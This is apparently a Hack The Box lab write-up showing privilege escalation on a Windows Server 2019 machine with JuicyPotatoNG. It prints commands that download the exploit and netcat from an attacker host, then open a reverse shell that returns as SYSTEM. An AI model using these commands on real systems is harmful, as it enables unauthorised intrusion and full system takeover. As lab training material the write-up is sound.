JuicyPotatoNG
The compromised iis-default
account has both SeAssignPrimaryTokenPrivilege and SeImpersonatePrivilege set.
this makes the target system vulnerable to the potato exploits
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809
& Windows Server 2019
The target system is Windows Server 2019
, so I would need something else.
There is a newer version of JuicyPotato called JuicyPotatoNG that works
- is newest version of Potato exploits
- uses a spoofing technique to bypass the windows firewall restriction (if enabled)
- is able to exploit LOCALLY
- more info can be found here
exploit
The binary can be downloaded from the official GitHub repo
Exploitation
ps c:\tmp> iwr -Uri http://10.10.16.8/potato/JuicyPotatoNG.exe -Outfile C:\tmp\JuicyPotatoNG.exe
ps c:\tmp> iwr -Uri http://10.10.16.8/potato/nc64.exe -Outfile C:\tmp\nc64.exe
Delivery complete Netcat will be used for a reverse shell payload for code execution
ps c:\tmp> .\JuicyPotatoNG.exe -t * -p C:\tmp\nc64.exe -a "10.10.16.8 1235 -e cmd"
Executing
┌──(kali㉿kali)-[~/archive/htb/labs/flight]
└─$ nnc 1235
listening on [any] 1235 ...
connect to [10.10.16.8] from (UNKNOWN) [10.10.11.187] 54300
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\> whoami
whoami
nt authority\system
c:\> hostname
hostname
g0
c:\> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::23d
ipv6 address. . . . . . . . . . . : dead:beef::b1d9:efc7:61e1:4d02
link-local ipv6 address . . . . . : fe80::b1d9:efc7:61e1:4d02%6
ipv4 address. . . . . . . . . . . : 10.10.11.187
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:d784%6
10.10.10.2
System Level Compromise